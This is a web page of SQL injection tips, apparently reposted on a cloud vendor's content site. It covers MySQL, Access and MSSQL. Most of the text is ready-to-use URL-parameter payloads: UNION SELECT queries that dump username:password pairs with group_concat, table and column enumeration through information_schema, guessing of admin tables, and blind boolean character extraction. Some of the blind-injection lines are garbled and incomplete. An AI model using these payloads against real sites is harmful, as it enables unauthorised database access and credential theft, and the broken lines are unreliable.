SQL Manual Injection Tips

Source: Internet
Author: User
Tags mssql

MySQL Chapter
1. Built-in functions and variables

    @@datadir,version(),database(),user(),load_file(),outfile()

2. Using Concat (), Group_concat (), CONCAT_WS () stitching query Results
Instance:

    xxx.php?id=1 and 1=2 union select 1,    group_concat(username,0x3a,password),3 from user

3. Querying the table segments and fields using the built-in database
Check the table segment:

    xxx.php?id=1 and 1=2 union select 1,2,table_name from     (select* from information_schema.tables where table_schema=数据库名的hex     order by table_schema limit 0,1)t

Check fields:

    xxx.php?id=1 and 1=2 union select 1,2,column_name from     (select* from information_schema.columns where table_name=表名的hex     and table_schema=数据库名hex值 order by 1 limit 1,1)t

Here can be combined with the next concat splicing function

    xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20)     from (select * from information_schema.columns where table_name=表名的hex     and table_schema=数据库名hex值 order by 1 limit 0,n)t limit 1–     [n表示第n条数据]  

Access article

Guess table name

    *.asp?id=1 and exists (select * from admin)

Guess Column Name

    *.asp?id=1 and exists (select password from admin)

Order by Query

    *.asp?id=1 order by 3

Union query

    *.asp?id=1 union select 1,password,3 from admin

Cases where the Union is not supported
Determine the length of the content first

    *.asp?idfrom>5

And then one guess

    *.asp?idfrom admin)>97

For example, to determine that the value of ASC (Mid (user,1,1)) is 97, you can determine that the first character of the user is a
OK then continue guessing from the second position

    *.asp?idfrom admin)>97

And so on

MSSQL article
MSSQL injection based on error:
Judging whether it's MSSQL

    'and exists (select * from sysobjects) --

If returned to normal, it is MSSQL, otherwise when the sysobjects does not exist, will be an error.

Guess table name:

    'and exists(select * from admin)--

If it exists, it will return to the normal page, otherwise the error is not present.

SQL Manual Injection Tips

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.